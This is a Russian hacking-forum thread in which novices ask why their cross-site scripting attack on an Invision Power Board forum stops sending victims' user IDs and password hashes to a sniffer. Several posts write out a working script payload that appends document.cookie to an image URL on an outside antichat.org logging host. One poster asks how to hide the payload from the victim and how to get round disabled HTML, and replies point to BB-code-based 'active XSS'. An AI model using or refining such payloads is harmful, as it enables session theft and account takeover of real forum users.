Почему-то не срабатывает сниффер http://www.antichat.ru/sniff/. Я его натравливал на форум http://www.ссылки запрещены.ru/forum/index.php где-то месяц назад - он показывал номера юзеров и их хэши. Сегодня я такое повторил - он ничего не выдает: пишет, что был запрос и все! Если кто знает - поясните пожалуйста в чем здесь проблема или хотя бы ссылку! Я искал по форуму, но не нашел ответа! Вот ссылка на сниффер http://www.antichat.ru/sniff/log.php. Администраторам: перенесите, пожалуйста, мое сообщение в соответствующий раздел!

Аналогично, форум Invision Power Board(U) v1.3.1 Final. Я посылаю примерное сообщение:

Привет чувак <script>img = new Image(); img.src = "http://antichat.org/s/.gif
"+document.cookie;</script>
Я его посылаю себе для пробы, мне приходит эта ссылка! Какой в этом смысл? ничего не приходит мне на снифф! что я не так делаю? заранее благодарен.
Может надо в код вставить? но там опять светится это сообщение.

2BlackSpider я так понимаю что бага работает только под ие...
2SiltStride возможно этото xss работает только в теле вообщения форума. что бы провритьь при создании ответа ткни "предварительный просмотр"

SiltStride возможно этото xss работает только в теле вообщения форума. что бы провритьь при создании ответа ткни "предварительный просмотр"
Получается, надо не в личку писать? а само сообщение правильное, не надо добавить что-нибудь, типа кода? например:
это сообщение надо писать в коде
так не надо? просто писать?

Кстати, куда в этом коде картинку вставлять? после каких слов?
Вот он:
<script>img = new Image(); img.src = "http://antichat.org/s/.gif
"+document.cookie;</script>
и еще,как сделать, чтобы пользователь не пропалил этот прикол, в ответе чтобы этого не было?

--> и еще,как сделать, чтобы пользователь не пропалил этот прикол, в ответе чтобы этого не было?

Учить javascript, юзать поиск по форуму и гугл http://www.google.ru/search?hl=ru&q=%D0%BE%D0%BF%D0%B8%D1%81%D0%B0%D0%BD%D0%B8%D0%B5 +cross+site+scripting&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=lang_ru, читать статьи на античате http://antichat.ru/crackchat/HTML

Ознакомиться с этой темой http://forum.antichat.ru/thread15678.html и со многими другими.

Че-то как-то все так отмодерировали, что я ничего не понял... какая проблемма?
Вот это <scrip*t>img = ne*w Image(); im*g.src = "http://antichat.org/s/.gif
"+document.c*ookie;</s*cript>
сработает только, если включен хтмл.

хз где вы это пытаетесь сделать, а на ruhelp'е не получается. Там авторизацию по сессиям ввели.

на http://www.ссылки запрещены.ru! помогите кто нитбудь! как ссылку сделать? пишу, а он доходит так, как я отправляю! А что значит Хтмл отключен?как его включить? Я все перепробовал, ничего не помогает! дайте пожалуйста по этому поводу совет.

на http://www.ссылки запрещены.ru! помогите кто нитбудь! как ссылку сделать? пишу, а он доходит так, как я отправляю! А что значит Хтмл отключен?как его включить? Я все перепробовал, ничего не помогает! дайте пожалуйста по этому поводу совет.
Раз ты такое пишешь, то совет тебе - прочитать все на античате или хотя бы важные темы (они написаны так Важно: и прикрепелены наверху раздела.

Так а с чего начать хотя бы?подскажите,пожалуйста, а то на сайте много статей и все вытекают одна из другой! с чего начать? заранее благодарен

Сейчас я кое-что прочитал и начал в этом деле немного смыслить. Спасибо и респект вам! но у меня возникла проблема, я не могу послать что-то типа

<script>img = new Image(); img.src = "http://antichat.org/s/StrideHak.gif?"+document.cookie;</script>!!!

И я, кажется, знаю почему, потому что Хтмл код отключен. что мне сделать, чтобы успешно обойти это препятствие?

И я, кажется, знаю почему, потому что Хтмл код отключен. что мне сделать, чтобы успешно обойти это препятствие?
Для этого читаешь дальше и потом поймешь, что такое активная Xss на форумах.
Если в кратце, то это, когда у тебя ББ-тэги парсятя по очереди и превращаются в хтмл нужный тебе в итоге не странице форума. Если что-то не понял, то ищи по этим словам на форуме. ;)

Для этого читаешь дальше и потом поймешь, что такое активная Xss на форумах.
Если в кратце, то это, когда у тебя ББ-тэги парсятя по очереди и превращаются в хтмл нужный тебе в итоге не странице форума. Если что-то не понял, то ищи по этим словам на форуме. ;)
Не нашел! :confused: мне, пожалуйста, напиши их правильно, а то поиск в таком виде ничего не дает! :rolleyes:

Нашел видео, посмотрел, сделал, как там было, а ничего не получилось!